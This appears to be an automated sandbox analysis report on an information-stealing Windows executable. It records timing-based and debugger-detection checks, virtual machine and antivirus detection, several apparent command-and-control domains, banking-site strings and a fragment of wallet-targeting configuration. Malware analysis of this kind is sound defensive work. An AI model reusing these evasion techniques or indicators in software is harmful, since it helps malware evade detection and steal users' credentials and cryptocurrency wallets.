Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 519091A second address: 5190920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190920 second address: 519093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 519093B second address: 519093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 519093F second address: 5190943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190943 second address: 5190949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190949 second address: 519094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 519094F second address: 5190975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [770E459Ch], 05h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, 63h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190975 second address: 51909BC instructions: 0x00000000 rdtsc 0x00000002 call 00007FD09CF151C9h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 9904h 0x0000000e popad 0x0000000f je 00007FD10EE0321Dh 0x00000015 jmp 00007FD09CF151C3h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c mov si, C41Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 movzx ecx, di 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51909EF second address: 5190A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190A0C second address: 5190A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD09CF151C7h 0x00000008 pop eax 0x00000009 jmp 00007FD09CF151C9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 3993E087h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CF151C9h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190A65 second address: 5190A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190A6B second address: 5190AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov cx, 4B75h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D79BBA1h 0x00000013 pushad 0x00000014 jmp 00007FD09CF151BEh 0x00000019 mov si, 7161h 0x0000001d popad 0x0000001e call 00007FD10EE0A296h 0x00000023 push 77082B70h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov eax, dword ptr [esp+10h] 0x00000033 mov dword ptr [esp+10h], ebp 0x00000037 lea ebp, dword ptr [esp+10h] 0x0000003b sub esp, eax 0x0000003d push ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 mov eax, dword ptr [770E4538h] 0x00000045 xor dword ptr [ebp-04h], eax 0x00000048 xor eax, ebp 0x0000004a push eax 0x0000004b mov dword ptr [ebp-18h], esp 0x0000004e push dword ptr [ebp-08h] 0x00000051 mov eax, dword ptr [ebp-04h] 0x00000054 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005b mov dword ptr [ebp-08h], eax 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b mov bx, 170Ch 0x0000006f pushad 0x00000070 popad 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190AA1 second address: 5190AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190AA7 second address: 5190AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190AAB second address: 5190B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD09CB0C7F5h 0x00000011 sub si, EC96h 0x00000016 jmp 00007FD09CB0C7F1h 0x0000001b popfd 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007FD09CB0C7F7h 0x00000023 or ah, FFFFFFCEh 0x00000026 jmp 00007FD09CB0C7F9h 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e mov dword ptr [ebp-1Ch], esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov ch, 4Eh 0x00000036 movsx ebx, si 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190B90 second address: 5190B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190B94 second address: 5190B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 5190B98 second address: 5190B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0A4E second address: 51A0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FD09CB0C7EAh 0x00000013 jmp 00007FD09CB0C7F5h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0A88 second address: 51A0A9E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FD09CF151BDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0A9E second address: 51A0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c movzx eax, bx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD09CB0C7F7h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CB0C7F5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0ADF second address: 51A0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD09CF151BDh 0x0000000b add ecx, 6D64DA96h 0x00000011 jmp 00007FD09CF151C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FD09CF151C6h 0x00000024 sub ax, 41E8h 0x00000029 jmp 00007FD09CF151BBh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0B39 second address: 51A0B8D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD09CB0C7F8h 0x00000008 sbb ax, D448h 0x0000000d jmp 00007FD09CB0C7EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD09CB0C7F9h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bh, 47h 0x00000022 mov si, 00BBh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0B8D second address: 51A0BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FD09CF151BEh 0x00000011 test esi, esi 0x00000013 jmp 00007FD09CF151C0h 0x00000018 je 00007FD10EDF29A8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0BD1 second address: 51A0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0BD5 second address: 51A0BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0BF2 second address: 51A0C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, EC12h 0x00000007 pushfd 0x00000008 jmp 00007FD09CB0C7F3h 0x0000000d sbb ah, 0000000Eh 0x00000010 jmp 00007FD09CB0C7F9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [770E459Ch], 05h 0x00000020 jmp 00007FD09CB0C7EEh 0x00000025 je 00007FD10EA0203Bh 0x0000002b jmp 00007FD09CB0C7F0h 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0C5F second address: 51A0C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | RDTSC instruction interceptor: First address: 51A0C63 second address: 51A0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Special instruction interceptor: First address: F77CA6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Special instruction interceptor: First address: 11AD50A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7444 | Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7380 | Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 2088 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7376 | Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Last function: Thread delayed
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696501413o
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Amcache.hve.5.dr | Binary or memory string: VMware
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696501413j
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Amcache.hve.5.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Amcache.hve.5.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Amcache.hve.5.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Amcache.hve.5.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Amcache.hve.5.dr | Binary or memory string: VMware VMCI Bus Device
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual RAM
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Amcache.hve.5.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696501413
Source: Amcache.hve.5.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Yh6fS6qfTE.exe, 00000000.00000002.1869904751.0000000001100000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Amcache.hve.5.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Amcache.hve.5.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696501413s
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B54000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696501413p
Source: Amcache.hve.5.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Amcache.hve.5.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr | Binary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.5.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696501413
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: Yh6fS6qfTE.exe, 00000000.00000002.1869904751.0000000001100000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696501413f
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: NTICE
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: SICE
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: bashfulacid.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: tentabatte.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: curverpluch.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: talkynicer.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: shapestickyr.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: manyrestro.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: slipperyloo.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: wordyfindy.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: observerfry.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1870245572.0000000001142000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1475371147.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1462741670.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr | Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514509667.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 20},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/EleX
